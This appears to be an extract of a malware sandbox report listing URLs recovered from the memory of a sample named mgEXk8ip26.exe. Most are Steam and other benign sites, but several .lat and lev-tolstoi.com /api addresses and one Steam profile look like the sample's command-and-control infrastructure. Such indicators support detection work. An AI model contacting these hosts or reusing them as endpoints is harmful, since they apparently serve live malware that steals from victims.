                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://player.vimeo.commgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://store.steampowered.cmgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://energyaffai.lat:443/apiTmgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260488098.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://steamcommunity.com/?subsection=broadcastsmgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstmgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://store.steampowered.com/subscriber_agreement/mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.gstatic.cn/recaptcha/mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEEmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.valvesoftware.com/legal.htmmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enmgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.google.commgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://grannyejh.lat:443/apimgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260488098.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://lev-tolstoi.com/api%mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englmgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englismgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/webui/clientcmgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://steam.tv/mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://lev-tolstoi.com/mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260432379.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231900797.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2232032860.000000000141B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://store.steampowered.com/privacy_agreement/mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://steamcommunity.com:443/profiles/76561199724331900mgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260488098.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valvemgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://store.steampowered.com/points/shop/mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&amgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://sketchfab.commgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://lv.queniujq.cnmgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://aspecteirs.lat:443/apimgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260488098.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://steamcommunity.com/profiles/76561199724331900/inventory/mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.youtube.com/mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://store.steampowered.com/privacy_agreement/mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://community.fastly.steamstatic.mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickermgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&ammgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.google.com/recaptcha/mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://checkout.steampowered.com/mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://sweepyribs.lat:443/apimgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260488098.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://store.steampowered.com/;mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/about/mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://steamcommunity.com/my/wishlist/mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.fastly.steamstatic.com/pgmgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://help.steampowered.com/en/mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://steamcommunity.com/market/mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://store.steampowered.com/news/mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://recaptcha.net/recaptcha/LmgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=emgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://store.steampowered.com/subscriber_agreement/mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgmgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://steamcommunity.comgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://steamcommunity.com/discussions/mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fmgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://store.steampowered.com/stats/mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&ammgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://lev-tolstoi.com:443/api-mgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260488098.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://medal.tvmgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://broadcast.st.dl.eccdnx.commgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&amgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://store.steampowered.com/steam_refunds/mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://avatars.fastly.steamstatic.co8mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&amgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=emgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.stmgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://s.ytimmgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://steamcommunity.com/workshop/mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
